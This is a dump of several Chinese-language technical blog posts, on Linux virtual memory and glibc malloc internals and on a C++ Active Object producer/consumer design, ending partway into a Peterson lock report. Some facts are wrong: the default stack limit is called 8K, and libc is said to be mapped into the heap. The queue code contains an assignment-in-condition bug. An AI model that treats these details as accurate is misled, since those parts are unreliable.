Top Sports News at 2:56 a.m. EDT 244 | - 245 | Latest News 246 | NYT > Sports 247 | - 248 | - 249 | Movies : NPR 250 | - 251 | Arts & Life : NPR 252 | Fresh Air : NPR 253 | - 254 | - 255 | FRONTLINE - Latest Stories 256 | - 257 | Utah 258 | - 259 | - 260 | Utah - The Salt Lake Tribune 261 | KSL / Utah / Local Stories 262 | - 263 | Yahoo News - Latest News & Headlines 264 | - 265 | NYT > Home Page 266 | - 267 | - 268 | Reuters: U.S. 269 | - 270 | Reuters: Top News 271 | Reuters: World News 272 | - 273 | AP Top Science News at 6:06 a.m. EDT 274 | - 275 | BBC News - US & Canada 276 | CNN.com - RSS Channel - HP Hero 277 | - 278 | AP Top U.S. News at 3:16 a.m. EDT 279 | - 280 | BBC News - Home 281 | News : NPR 282 | - 283 | Techlearning RSS Feed 284 | - 285 | CBNNews.com 286 | - 287 | GANNETT Syndication Service 288 | - 289 | ASCD SmartBrief 290 | sites.google.com/view/kamagratablette/ 291 | ``` 292 |   可以看到,最终结果还凑合,如果关键词选取的更细致的话,那么结果将会更加准确。 293 | 294 | ### Reference 295 | - [Programming Collective Intelligence](http://shop.oreilly.com/product/9780596529321.do) 296 | 297 | ### Note 298 |   **GOOD LUCK, HAVE FUN!** 299 | -------------------------------------------------------------------------------- /memory-management.md: -------------------------------------------------------------------------------- 1 | Memory management every engineer need to know! 2 | ============================================== 3 | 4 | ## Prepare reading 5 | ### relevant reading: 6 | - [Anatomy of a Program in Memory](http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory/)
7 | - [How the Kernel Manages Your Memory](http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory/)
8 |
9 | 10 |    

11 | 系统启动时,**kernel**资源以及其他启动进程资源被load进`physical memory`。对于32位系统来说,进程启动时,它会拥有一块4G大小的`virtual memory`。我是一个叫`Nerd`的进程,启动的时候**kernel**给我这张图片,告诉我:你能使用的`User Mode Space`只有`3G`,然后从`0xc0000000`到`0xffffffff`是内核地址,你别动它,你没权限。`physical memory`和`virtual memory`的关系就是:`physical memory`是以PAGE的形式**Map**到`virtual memory`,**kernel**管理着所有的`page_table`,所以你程序启动过多的时候`physical memory`会吃紧,但是每次新启进程的`virtual memory`依然是4G。使用`top -p `查看进程的`resident memory`就是进程实际吃掉的`physical memory`,在检查`memory leak`的时候非常有用。(**TIP**:对于纯C程序来说,开启`mtrace()`,即可统计内存泄漏情况,或者自己用`__malloc_hook`之类的实现内存检测)。总的来说,`virtual memory`只是**kernel**开给每个进程的一张货币而已,`physical memory`分配过多必然会引发通货膨胀,然后发给我`Nerd`进程的货币就贬值了,无所谓啦,我是个`Nerd`。
12 |
13 | 14 |    

15 | `process switch`就是通过置换`virtual memory`的形式运转的,因为启动着的进程在`physical memory`里有各自的`resident memory`,所以这个置换只是暂存了`virtual memory`的状态,**kernel**状态,寄存器值等等进程相关的东西。而`thread`共享`process`的`TEXT`段,`DATA`段,`BSS`段,`HEAP`,所以`thread switch` is much cheaper than `process switch`。
16 |
17 | 18 |    

19 | 更加详细的`virtual memory`是这样的,`TEXT`段存储所有的代码,`DATA`段存储所有的已初始化`global variables`,例如`const char *msg="I am a nerd!"`,`msg`就是存储在`DATA`段, `BSS`段存储所有的未初始化`global variables`,并且内存全部初始化为0,例如`const char *msg`存放在`BSS`段,但是肯定不是指向`"I am a nerd!"`,因为它指向`NULL`。`memory allocator`的实现有两种方式,其一是通过`brk()`系统调用(**TIPS**:`sbrk()` calls `brk()`),其二是通过`mmap()``ANONYMOUS`或者`/dev/zero`(`mmap()`实现的`calloc()`就是这么干的)。`brk()`是从`program break`开始向高地址增长(**TIPS**:`sbrk(0)`可以获取`program break`, 任何越过`program break`的内存读写都是`illegal access`),例如`sbrk(4096)`就表示申请`4K`的内存,`sbrk(-4096)`就是释放`4K`内存,`program break`向低地址移动`4096`(**TIPS**:有些platform不支持`sbrk()`传入负值)。`mmap()`申请的内存是由高地址向低地址写的。关于`stack`,使用`ulimit -s`显示最大可用栈大小,一般是`8192`即`8K`,所以谨慎使用递归算法,很容易造成`stack overflow`。使用`stack`的一个好处就是,`stack`上频繁使用的`location`很可能会被`mirror`进CPU `L1 cache`,但是也不能完全依赖这一点,因为不是我们能控制的,over-use很容易造成`stack overflow`。(relevant reading:>[stack and cache question](http://www.gamedev.net/topic/564817-stack-and-cache-question-optimizing-sw-in-c/#entry4617168) >[c++ stack memory and cpu cache](http://stackoverflow.com/questions/23760725/c-stack-memory-and-cpu-cache))
20 | 如果你是一个细心的读者,可能会问:为什么`TEXT`段的起始地址是`0x08048000`。__Here is the explain__:
21 | 使用`cat /proc/self/maps`查看当前`terminal`的内存`map`情况。
22 | 对于32位系统是这样的:
23 | ``` 24 | 001c0000-00317000 r-xp 00000000 08:01 245836 /lib/libc-2.12.1.so 25 | 00317000-00318000 ---p 00157000 08:01 245836 /lib/libc-2.12.1.so 26 | 00318000-0031a000 r--p 00157000 08:01 245836 /lib/libc-2.12.1.so 27 | 0031a000-0031b000 rw-p 00159000 08:01 245836 /lib/libc-2.12.1.so 28 | 0031b000-0031e000 rw-p 00000000 00:00 0 29 | 00376000-00377000 r-xp 00000000 00:00 0 [vdso] 30 | 00852000-0086e000 r-xp 00000000 08:01 245783 /lib/ld-2.12.1.so 31 | 0086e000-0086f000 r--p 0001b000 08:01 245783 /lib/ld-2.12.1.so 32 | 0086f000-00870000 rw-p 0001c000 08:01 245783 /lib/ld-2.12.1.so 33 | 08048000-08051000 r-xp 00000000 08:01 2244617 /bin/cat 34 | 08051000-08052000 r--p 00008000 08:01 2244617 /bin/cat 35 | 08052000-08053000 rw-p 00009000 08:01 2244617 /bin/cat 36 | 09ab5000-09ad6000 rw-p 00000000 00:00 0 [heap] 37 | b7502000-b7702000 r--p 00000000 08:01 4456455 /usr/lib/locale/locale-archive 38 | b7702000-b7703000 rw-p 00000000 00:00 0 39 | b771b000-b771c000 r--p 002a1000 08:01 4456455 /usr/lib/locale/locale-archive 40 | b771c000-b771e000 rw-p 00000000 00:00 0 41 | bfbd9000-bfbfa000 rw-p 00000000 00:00 0 [stack] 42 | ``` 43 | `0x08048000`之前是`library kernel maaped for syscalls`,事实上呢,你可以`map`任何你想要的东西到这块内存,`128M`哟。
44 | 对于64位系统是这样的:
45 | ``` 46 | 00400000-0040b000 r-xp 00000000 ca:01 400116 /bin/cat 47 | 0060a000-0060c000 rw-p 0000a000 ca:01 400116 /bin/cat 48 | 0062c000-0064d000 rw-p 00000000 00:00 0 [heap] 49 | 7f38ab82e000-7f38b1d55000 r--p 00000000 ca:01 454475 /usr/lib/locale/locale-archive 50 | 7f38b1d55000-7f38b1f0c000 r-xp 00000000 ca:01 396116 /lib64/libc-2.17.so 51 | 7f38b1f0c000-7f38b210c000 ---p 001b7000 ca:01 396116 /lib64/libc-2.17.so 52 | 7f38b210c000-7f38b2110000 r--p 001b7000 ca:01 396116 /lib64/libc-2.17.so 53 | 7f38b2110000-7f38b2112000 rw-p 001bb000 ca:01 396116 /lib64/libc-2.17.so 54 | 7f38b2112000-7f38b2117000 rw-p 00000000 00:00 0 55 | 7f38b2117000-7f38b2138000 r-xp 00000000 ca:01 396509 /lib64/ld-2.17.so 56 | 7f38b2323000-7f38b2326000 rw-p 00000000 00:00 0 57 | 7f38b2337000-7f38b2338000 rw-p 00000000 00:00 0 58 | 7f38b2338000-7f38b2339000 r--p 00021000 ca:01 396509 /lib64/ld-2.17.so 59 | 7f38b2339000-7f38b233a000 rw-p 00022000 ca:01 396509 /lib64/ld-2.17.so 60 | 7f38b233a000-7f38b233b000 rw-p 00000000 00:00 0 61 | 7ffcffe94000-7ffcffeb5000 rw-p 00000000 00:00 0 [stack] 62 | 7ffcfffa1000-7ffcfffa3000 r-xp 00000000 00:00 0 [vdso] 63 | ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] 64 | ``` 65 | `libc`和`ld`被`map`到了堆内存,`0x00400000`以下的地址可能有东西,也可能没东西,你同样可以`map`你想要的东西到这块内存。
66 | 更加细心的读者可能要问:为什么要有`random brk offset`,`random stack offset`和`random mmap offset`?这是为了避免直接算得某个进程的`virtual memory`详细地址,然后可以利用这个远程`PWN`(反正我不会,大牛可以教教我^_^)。
67 |
68 | 69 |    

70 | 这个图是更加详细的解释,`const char *msg="I am a nerd!"`,`msg`会存在`DATA`段,`"I am a nerd!"`存在`TEXT`段,是只读的。可执行文件大小 = `TEXT` + `DATA`!
71 |
72 | 73 |    

74 | 这个是经典的没有各种`offset`的`virtual memory` layout。
75 |
76 | 77 |    
78 |
79 |    

80 | 我就不解释了,不会kernel,详情自己看[relevant reading: How the Kernel Manages Your Memory](#relevant-reading) 81 | 82 | ## Dinner time: Memory allocator and memory management of glibc 83 | 84 | - `glibc`内存管理基于`ptmalloc`,`ptmalloc`基于`dlmalloc` 85 | - `dlmalloc`源码:[dlmalloc](https://github.com/linghuazaii/dlmalloc) 86 | - `ptmalloc`源码:[ptmalloc](http://www.malloc.de/malloc/ptmalloc3-current.tar.gz) 87 |

88 | ``` 89 | struct malloc_chunk { 90 | 91 | INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ 92 | INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */ 93 | 94 | struct malloc_chunk* fd; /* double links -- used only if free. */ 95 | struct malloc_chunk* bk; 96 | }; 97 | ``` 98 | `dlmalloc`使用`malloc_chunk`结构体存储每块申请的内存的具体信息,在32位系统里`sizeof(malloc_chunk) = 16`,在64位系统里`sizeof(malloc_chunk) = 32`,**example:**
99 | ``` 100 | int main(int argc, char **argv) { 101 | void *mem = malloc(0); 102 | malloc_stats(); 103 | 104 | return 0; 105 | } 106 | ``` 107 | 我的机器是64位的,调用`malloc(0)`其实也申请了内存,这块内存空间大小就是`sizeof(malloc_chunk) = 32`,运行以上代码将显示如下结果:
108 | > Arena 0:
109 | > system bytes = 135168
110 | > **in use bytes = 32**
111 | > Total (incl. mmap):
112 | > system bytes = 135168
113 | > in use bytes = 32
114 | > max mmap regions = 0
115 | > max mmap bytes = 0
116 | 117 | 所以,你申请的内存看上去是这样子的。
118 |    

119 | 120 | ``` 121 | struct malloc_state { 122 | /* The maximum chunk size to be eligible for fastbin */ 123 | INTERNAL_SIZE_T max_fast; /* low 2 bits used as flags */ 124 | /* Fastbins */ 125 | mfastbinptr fastbins[NFASTBINS]; 126 | /* Base of the topmost chunk -- not otherwise kept in a bin */ 127 | mchunkptr top; 128 | /* The remainder from the most recent split of a small request */ 129 | mchunkptr last_remainder; 130 | /* Normal bins packed as described above */ 131 | mchunkptr bins[NBINS * 2]; 132 | /* Bitmap of bins. Trailing zero map handles cases of largest binned size */ 133 | unsigned int binmap[BINMAPSIZE+1]; 134 | /* Tunable parameters */ 135 | CHUNK_SIZE_T trim_threshold; 136 | INTERNAL_SIZE_T top_pad; 137 | INTERNAL_SIZE_T mmap_threshold; 138 | /* Memory map support */ 139 | int n_mmaps; 140 | int n_mmaps_max; 141 | int max_n_mmaps; 142 | /* Cache malloc_getpagesize */ 143 | unsigned int pagesize; 144 | /* Track properties of MORECORE */ 145 | unsigned int morecore_properties; 146 | /* Statistics */ 147 | INTERNAL_SIZE_T mmapped_mem; 148 | INTERNAL_SIZE_T sbrked_mem; 149 | INTERNAL_SIZE_T max_sbrked_mem; 150 | INTERNAL_SIZE_T max_mmapped_mem; 151 | INTERNAL_SIZE_T max_total_mem; 152 | }; 153 | 154 | typedef struct malloc_state *mstate; 155 | static struct malloc_state av_; 156 | ``` 157 | 这个名叫`av_`的结构体就是用来存储内存申请的具体信息的,无论是`brk`的也好,还是`mmap`的也好,都会记录在案。
158 |
159 | 160 | **关于malloc**
161 | - 当你调用`malloc`时,`dlmalloc`首先确定`mstate.fastbins`和`mstate.bins`有没有满足需求的内存块大小,有就可以直接使用。如果`malloc`申请内存大小超过`M_MMAP_THRESHOLD`即`128 * 1024`并且`free list`里没有满足需要的内存大小,`malloc`就会调用`mmap`申请内存。因为有一个`header`,所以大小为`128 * 1024 - 32`,具体信息可以`man mallopt`,我就不贴`dlmalloc`的源码了,感兴趣可以自己去翻。**example:(strace跟踪系统调用)**
162 | ``` 163 | int main(int argc, char **argv) { 164 | void *mem = malloc(1024 * 128 - 24); 165 | malloc_stats(); 166 | 167 | return 0; 168 | } 169 | ``` 170 | 编译以上代码,`strace`结果:
171 | > brk(0) = 0xa2c000
172 | > brk(0xa6d000) = 0xa6d000
173 | 174 | ``` 175 | int main(int argc, char **argv) { 176 | void *mem = malloc(1024 * 128 - 24 + 1); 177 | malloc_stats(); 178 | 179 | return 0; 180 | } 181 | ``` 182 | 编译以上代码,`strace`结果:
183 | > mmap(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f65339a6000
184 | 185 | 为什么是24而不是`sizeof(malloc_chunk)`,我猜`glibc`修改了`dlmalloc`实现,因为我看到的`dlmalloc`源码不是这样子的。
186 |
187 | 188 | **关于malloc_trim**
189 | - `malloc_trim`用来归还申请的内存给系统,但是只归还通过`brk`申请的内存块,归还大小为`N * PAGE_SZIE`,一般linux的`PAGE_SIZE`为4096Bytes,详情可以`man getpagesize`。
190 |
191 | 192 | **关于free**
193 | - `free`归还通过`brk`申请的内存到`mstate.fastbin`,如果`free`的内存是通过`brk`申请的并且其大小超过了`FASTBIN_CONSOLIDATION_THRESHOLD`即`DEFAULT_TRIM_THRESHOLD >> 1`即`256 * 1024 / 2`即`128K`,那么这块内存会通过`brk`缩减`program break`的方式直接归还给系统,`mmap`申请的内存直接通过`munmap`归还给系统。
194 |
195 | 196 | **关于realloc**
197 | - `realloc`嘛,自己`man realloc`吧,就是`malloc + memcpy`,但是此`memcpy`非彼`memcpy`,此`memcpy`是通过宏定义来实现的,代码如下:
198 | ``` 199 | #define MALLOC_COPY(dest,src,nbytes) \ 200 | do { \ 201 | INTERNAL_SIZE_T* mcsrc = (INTERNAL_SIZE_T*) src; \ 202 | INTERNAL_SIZE_T* mcdst = (INTERNAL_SIZE_T*) dest; \ 203 | CHUNK_SIZE_T mctmp = (nbytes)/sizeof(INTERNAL_SIZE_T); \ 204 | long mcn; \ 205 | if (mctmp < 8) mcn = 0; else { mcn = (mctmp-1)/8; mctmp %= 8; } \ 206 | switch (mctmp) { \ 207 | case 0: for(;;) { *mcdst++ = *mcsrc++; \ 208 | case 7: *mcdst++ = *mcsrc++; \ 209 | case 6: *mcdst++ = *mcsrc++; \ 210 | case 5: *mcdst++ = *mcsrc++; \ 211 | case 4: *mcdst++ = *mcsrc++; \ 212 | case 3: *mcdst++ = *mcsrc++; \ 213 | case 2: *mcdst++ = *mcsrc++; \ 214 | case 1: *mcdst++ = *mcsrc++; if(mcn <= 0) break; mcn--; } \ 215 | } \ 216 | } while(0) 217 | ``` 218 |
219 | 220 | **关于memalign**
221 | - 不太看得懂,略过吧,反正是通过位运算实现的。
222 |
223 | 224 | **关于calloc**
225 | - `calloc`先调用`malloc`,然后调用`memset`,但是此`memset`非彼`memset`,此`memset`是通过宏定义实现的,代码如下:
226 | ``` 227 | #define MALLOC_ZERO(charp, nbytes) \ 228 | do { \ 229 | INTERNAL_SIZE_T* mzp = (INTERNAL_SIZE_T*)(charp); \ 230 | CHUNK_SIZE_T mctmp = (nbytes)/sizeof(INTERNAL_SIZE_T); \ 231 | long mcn; \ 232 | if (mctmp < 8) mcn = 0; else { mcn = (mctmp-1)/8; mctmp %= 8; } \ 233 | switch (mctmp) { \ 234 | case 0: for(;;) { *mzp++ = 0; \ 235 | case 7: *mzp++ = 0; \ 236 | case 6: *mzp++ = 0; \ 237 | case 5: *mzp++ = 0; \ 238 | case 4: *mzp++ = 0; \ 239 | case 3: *mzp++ = 0; \ 240 | case 2: *mzp++ = 0; \ 241 | case 1: *mzp++ = 0; if(mcn <= 0) break; mcn--; } \ 242 | } \ 243 | } while(0) 244 | ``` 245 | 说实话,这个我没看太懂。
246 |
247 | 248 | **结语**
249 | - 就到这里吧,大家有什么感兴趣的想学的东西可以发邮件到我的email:[charles.cn.bj@gmail.com](charles.cn.bj@gmail.com) 250 | - Google有自己的`tcmalloc`,GNU有自己通过`ptmalloc`改编的`malloc`,市面上还有`jemalloc`等等其他的`memory allocator`,写完这篇,我也要去写个`charles_malloc`了,Byebye…… 251 | -------------------------------------------------------------------------------- /parallel-programming-active_object_design_pattern.md: -------------------------------------------------------------------------------- 1 | [Parallel Programming]Active Object Design Pattern 2 | =================================================== 3 | 4 | ### 前言 5 |   试着思考这样一个问题,假设我们有一个文字处理应用,点击保存按钮的时候,不要阻塞在保存这里,而是将保存按钮灰色显示,等到保存功能完成后,自动将保存按钮恢复正常显示。在单线程版本下,必须得等保存完成,这对任何GUI来说都是致命的。或许你会说,这期起一个后台线程去做保存功能,可以是可以,但并不是一个好的设计。而Active Object Design Pattern或者说Concurrent Object Design Pattern就是用来做异步的设计,常用于GUI,Web Server的设计。本文要实现一个简易的Producer&Consumer的消息系统,当然并不是进程之间的,是进程内多线程之间的。 6 | 7 | ### Active Object Design Pattern 8 |   Active Object Design Pattern的核心思想就是函数调用和函数实现相分离,这样抽象出两个角色,一个是`Proxy`,另一个是`Servant`。`Proxy`负责所有Client的函数调用,`Servant`负责所有`Proxy`函数调用的具体实现。函数调用到函数实现是在不同的线程里完成,那么怎么实现一个同步呢?这里需要一个`ActiveObjectQueue`,这个队列里装的是所有从`Proxy`生成的Active Object。动态维护这个队列需要抽象出一个`Scheduler`,`Scheduler`负责将`Proxy`的Request加入到`ActiveObjectQueue`队列,并且一直循环分发这些Request到具体的`Servant`实现。在本例子中,我们将ActiveObject抽象为一个抽象类`MethodRequest`。而不同线程之间的消息传递抽象为`MessageFuture`,将所有的消息抽象为`Message`。以上文字可能并不能在你的脑海里勾画出一个完成的架构图,下面我们画一画架构图。 9 | 10 | ### 架构图 11 |    12 |   如图所示,只有Proxy对于Client是可见的,其他部分对于Client都是不可见的。可能这个图还是不能在你的脑海里勾勒出这个设计的所有细节,确实,我在学这个设计模式的时候,也懵逼了好久好久,知道我读到《[The Art Of MultiProcessor Programming](http://coolfire.insomnia247.nl/c&mt/Herlihy,%20Shavit%20-%20The%20art%20of%20multiprocessor%20programming.pdf)》里面的Concurrent Object的时候我才豁然开朗,实现了本文的例子。下面我们各个击破,将每个部分分解出来。 13 | 14 | ### Proxy 15 |   只有`Proxy`对于Client是可见的,以下是`Proxy`的实现。 16 | ```cpp 17 | #ifndef _PROXY_H 18 | #define _PROXY_H 19 | /* 20 | * File: proxy.h 21 | * Author: Charles, Liu. 22 | * Mailto: charlesliu.cn.bj@gmail.com 23 | */ 24 | #include "servant.h" 25 | #include "method_request.h" 26 | #include "message.h" 27 | #include "message_future.h" 28 | #include "scheduler.h" 29 | #include "producer.h" 30 | #include "consumer.h" 31 | 32 | class Proxy { 33 | public: 34 | enum { MAX_SIZE = 1000 }; 35 | Proxy(size_t size = MAX_SIZE) { 36 | scheduler_ = new Scheduler(size); 37 | servant_ = new Servant(size); 38 | scheduler_->run(); 39 | } 40 | ~Proxy() { 41 | delete scheduler_; 42 | delete servant_; 43 | } 44 | void produce(Message &msg) { 45 | MethodRequest *method_request = new Producer(servant_, msg); 46 | scheduler_->enqueue(method_request); 47 | } 48 | MessageFuture * consume() { 49 | MessageFuture *result = new MessageFuture; 50 | MethodRequest *method_request = new Consumer(servant_, result); 51 | scheduler_->enqueue(method_request); 52 | return result; 53 | } 54 | private: 55 | Servant *servant_; 56 | Scheduler *scheduler_; 57 | }; 58 | 59 | 60 | #endif 61 | ``` 62 |   本例实现的是一个Producer&Consumer消息系统,所以Client只需要调用`produce()`和`consumer()`,所以Proxy只有`produce()`和`consume()`两个方法。`Proxy`有一个`Servant`实例,正如上文所说,`Proxy`负责函数调用,`Servant`负责函数实现。`Proxy`还有一个`Scheduler`实例,`Scheduler`负责将所有的Active Object加到`ActiveObjectQueue`队列。`produce()`调用生成一个叫`Producer`的Active Object,`consume()`生成一个`Consumer`的Active Object,并且返回一个`MessageFuture`实例,这个`MessageFuture`会在`Servant`调用其`consume()`方法之后填充`Message`。 63 | 64 | ### Message 65 |   本例中的`Message`就是`std::string`的一个type definition。 66 | ```cpp 67 | #ifndef _MESSAGE_H 68 | #define _MESSAGE_H 69 | /* 70 | * File: message.h 71 | * Description: type definition for Message 72 | * Autor: Charles, Liu. 73 | * Mailto: charlesliu.cn.bj@gmail.com 74 | */ 75 | #include 76 | 77 | typedef std::string Message; 78 | 79 | #endif 80 | ``` 81 | 82 | ### MessageFuture 83 |   `MessageFuture`包含`consume()`填充的`Message`,并且包含一个`hasMessage()`方法用来判断`Message`是否填充,这样Consumer可以通过这个标志来轮询所有的`MessageFuture`,这样可以避免消息的丢失。 84 | ```cpp 85 | #ifndef _MESSAGE_FUTURE_H 86 | #define _MESSAGE_FUTURE_H 87 | /* 88 | * File: message_future.h 89 | * Description: type definition for class MessageFuture 90 | * Autor: Charles, Liu. 91 | * Mailto: charlesliu.cn.bj@gmail.com 92 | */ 93 | #include "message.h" 94 | 95 | class MessageFuture { 96 | public: 97 | MessageFuture() : has_message(false) {} 98 | ~MessageFuture() {} 99 | bool hasMessage() { 100 | return has_message; 101 | } 102 | Message getMessage() { 103 | return msg_; 104 | } 105 | void setMessage(Message &msg) { 106 | msg_ = msg; 107 | has_message = true; 108 | } 109 | private: 110 | Message msg_; 111 | bool has_message; 112 | }; 113 | 114 | #endif 115 | ``` 116 | 117 | ### Servant 118 |   `Servant`含有`Proxy`函数调用的具体实现,并且维护自己的消息FIFO队列,留给你一个问题思考:为什么`Servant`的`Message`队列不需要加锁?以此进一步思考Active Object Design Pattern做线程同步的本质。 119 | ```cpp 120 | #ifndef _SERVANT_H 121 | #define _SERVANT_H 122 | /* 123 | * File: servant.h 124 | * Author: Charles, Liu. 125 | * Mailto: charlesliu.cn.bj@gmain.com 126 | */ 127 | #include 128 | #include "message.h" 129 | #include "message_future.h" 130 | using std::queue; 131 | 132 | class Servant { 133 | public: 134 | Servant(size_t mq_size) : size(mq_size) {} 135 | void produce(const Message &msg) { 136 | mq.push(msg); 137 | } 138 | void consume(MessageFuture *future) { 139 | Message msg = mq.front(); 140 | mq.pop(); 141 | future->setMessage(msg); 142 | } 143 | bool empty() { 144 | return (mq.size() == 0); 145 | } 146 | bool full() { 147 | return (mq.size() == size); 148 | } 149 | private: 150 | queue mq; 151 | size_t size; 152 | }; 153 | 154 | #endif 155 | ``` 156 |   同时`Servant`还有一个`empty()`方法和一个`full()`方法用来检测消息队列的状态。 157 | 158 | ### MethodRequest 159 |   `MethodRequest`是所有Active Object的抽象父类,所有Active Object派生于此。 160 | ```cpp 161 | #ifndef _METHOD_REQUEST_H 162 | #define _METHOD_REQUEST_H 163 | /* 164 | * File: method_request.h 165 | * Author: Charles, Liu. 166 | * Mailto: charlesliu.cn.bj@gmail.com 167 | */ 168 | 169 | class MethodRequest { 170 | public: 171 | virtual bool guard() = 0; 172 | virtual void call() = 0; 173 | }; 174 | 175 | #endif 176 | ``` 177 | 178 | ### Producer 179 |   `Producer`派生自`MethodRequest`,是具体的Active Object。 180 | ```cpp 181 | #ifndef _PRODUCER_H 182 | #define _PRODUCER_H 183 | /* 184 | * File: producer.h 185 | * Author: Charles, Liu. 186 | * Mailto: charlesliu.cn.bj@gmail.com 187 | */ 188 | #include "servant.h" 189 | #include "method_request.h" 190 | #include "message.h" 191 | 192 | class Producer : public MethodRequest { 193 | public: 194 | Producer(Servant *servant, Message &msg) { 195 | servant_ = servant; 196 | msg_ = msg; 197 | } 198 | virtual bool guard() { 199 | return !servant_->full(); 200 | } 201 | virtual void call() { 202 | servant_->produce(msg_); 203 | } 204 | private: 205 | Servant *servant_; 206 | Message msg_; 207 | }; 208 | 209 | #endif 210 | ``` 211 | 212 | ### Consumer 213 |   `Consumer`派生自`MethodReqeust`,是具体的Active Object。 214 | ```cpp 215 | #ifndef _CONSUMER_H 216 | #define _CONSUMER_H 217 | /* 218 | * File: consumer.h 219 | * Author: Charles, Liu. 220 | * Mailto: charlesli.cn.bj@gmail.com 221 | */ 222 | #include "servant.h" 223 | #include "method_request.h" 224 | #include "message.h" 225 | #include "message_future.h" 226 | 227 | class Consumer : public MethodRequest { 228 | public: 229 | Consumer(Servant *servant, MessageFuture *future) { 230 | servant_ = servant; 231 | future_ = future; 232 | } 233 | virtual bool guard() { 234 | return !servant_->empty(); 235 | } 236 | virtual void call() { 237 | servant_->consume(future_); 238 | } 239 | private: 240 | Servant *servant_; 241 | MessageFuture *future_; 242 | }; 243 | 244 | #endif 245 | ``` 246 | 247 | ### ActivationQueue 248 |   `ActivationQueue`是具体的Active Object队列,因为`Proxy`和`Scheduler`是在不同的线程独立运行,所以得加一把锁。 249 | ```cpp 250 | #ifndef _ACTIVATION_QUEUE_H 251 | #define _ACTIVATION_QUEUE_H 252 | /* 253 | * File: activation_queue.h 254 | * Author: Charles, Liu. 255 | * Mailto: charlesliu.cn.bj@gmai.com 256 | */ 257 | #include 258 | #include 259 | #include "method_request.h" 260 | #include "lock.h" 261 | using std::vector; 262 | 263 | typedef vector ACTIVATION_QUEUE; 264 | typedef vector::iterator ACTIVATION_QUEUE_ITERATOR; 265 | 266 | class ActivationQueue { 267 | public: 268 | enum {INFINITE = -1}; 269 | ActivationQueue(size_t high_water_mark) { 270 | high_water_mark_ = high_water_mark; 271 | } 272 | ~ActivationQueue() { 273 | } 274 | void enqueue(MethodRequest *method_request, long msec_timeout = INFINITE) { 275 | int ret = 0; 276 | if (msec_timeout == INFINITE) 277 | lock.lock(); 278 | else 279 | ret = lock.timedlock(msec_timeout); 280 | 281 | if (ret == 0) { 282 | if (act_queue_.size() < high_water_mark_) 283 | act_queue_.push_back(method_request); 284 | } 285 | 286 | lock.unlock(); 287 | } 288 | void dequeue(MethodRequest *method_request, long msec_timeout = INFINITE) { 289 | int ret = 0; 290 | if (msec_timeout = INFINITE) 291 | lock.lock(); 292 | else 293 | ret = lock.timedlock(msec_timeout); 294 | 295 | if (ret == 0) { 296 | ACTIVATION_QUEUE_ITERATOR iter = find(act_queue_.begin(), act_queue_.end(), method_request); 297 | if (iter != act_queue_.end()) 298 | act_queue_.erase(iter); 299 | } 300 | 301 | lock.unlock(); 302 | } 303 | int size() { 304 | int count = 0; 305 | lock.lock(); 306 | count = act_queue_.size(); 307 | lock.unlock(); 308 | return count; 309 | } 310 | MethodRequest *at(size_t i) { 311 | MethodRequest *method_request; 312 | lock.lock(); 313 | method_request = act_queue_.at(i); 314 | lock.unlock(); 315 | return method_request; 316 | } 317 | private: 318 | vector act_queue_; 319 | size_t high_water_mark_; 320 | Lock lock; 321 | }; 322 | 323 | #endif 324 | ``` 325 | 326 | ### Scheduler 327 |   `Scheduler`含有一个`ActivationQueue`实例,`Proxy`通过`Scheduler`将具体的Active Object加到`ActivationQueue`队列。`Scheduler`运行的时候,启动一个线程一直观察`ActivationQueue`的Active Object的状态,如果`guard()`成功,则调用`call()`执行`Servant`里的具体方法。 328 | ```cpp 329 | #ifndef _SCHEDULER_H 330 | #define _SCHEDULER_H 331 | /* 332 | * File: scheduler.h 333 | * Description: type definition for class Scheduler 334 | * Author: Charles, Liu. 335 | * Mailto: charlesliu.cn.bj@gmail.com 336 | */ 337 | #include "activation_queue.h" 338 | #include "method_request.h" 339 | #include 340 | 341 | void* dispatch(void *arg); 342 | 343 | class Scheduler { 344 | public: 345 | Scheduler(size_t high_water_mark) { 346 | act_queue_ = new ActivationQueue(high_water_mark); 347 | svr_run = ::dispatch; 348 | } 349 | ~Scheduler() { 350 | delete act_queue_; 351 | } 352 | void enqueue(MethodRequest *method_request) { 353 | act_queue_->enqueue(method_request); 354 | } 355 | void run() { 356 | pthread_t thread_id; 357 | pthread_attr_t thread_attr; 358 | pthread_attr_init(&thread_attr); 359 | pthread_attr_setdetachstate(&thread_attr, PTHREAD_CREATE_DETACHED); 360 | pthread_create(&thread_id, &thread_attr, svr_run, this); 361 | pthread_attr_destroy(&thread_attr); 362 | } 363 | void dispatch() { 364 | ACTIVATION_QUEUE mark_delete; 365 | for (;;) { 366 | int count = act_queue_->size(); 367 | for (int i = 0; i < count; ++i) { 368 | MethodRequest *method_request = act_queue_->at(i); 369 | if (method_request == NULL) 370 | printf("method request is NULL\n"); 371 | if (method_request->guard()) { 372 | mark_delete.push_back(method_request); 373 | method_request->call(); 374 | } 375 | } 376 | for (ACTIVATION_QUEUE_ITERATOR iter = mark_delete.begin(); iter != mark_delete.end(); ++iter) { 377 | act_queue_->dequeue(*iter); 378 | } 379 | } 380 | } 381 | private: 382 | ActivationQueue *act_queue_; 383 | void *(*svr_run)(void *); 384 | }; 385 | 386 | void* dispatch(void *arg) { 387 | Scheduler *this_obj = (Scheduler *)arg; 388 | this_obj->dispatch(); 389 | } 390 | 391 | #endif 392 | ``` 393 | 394 | ### 项目源码 395 |   [Active Object项目源码](https://github.com/linghuazaii/parallel_programming/tree/master/active_object) 396 |   编译请用`g++ main.cpp -o active_object -lpthread` 397 |   本例运行结果如下: 398 |    399 |   时间续consume所有的Message。 400 | 401 | ### Reference 402 | - [Active Object Design Pattern Wiki](https://en.wikipedia.org/wiki/Active_object) 403 | - [Active Object](http://www.cs.wustl.edu/~schmidt/PDF/Act-Obj.pdf) 404 | 405 | ### 结语 406 |   **Good Luck! Have Fun!!!!!!** 407 | -------------------------------------------------------------------------------- /parallel-programming-peterson_lock_report.md: -------------------------------------------------------------------------------- 1 | [Parallel Programming]Peterson Lock 研究报告 2 | =========================================== 3 | 4 | #### 作者信息 5 |   Charles, Liu  charlesliu.cn.bj@gmail.com  安远国际 6 |   Derek, Zhang  anonymous@anonymous.com  百度 7 | 8 | ### 前言 9 |   前段时间研究Peterson 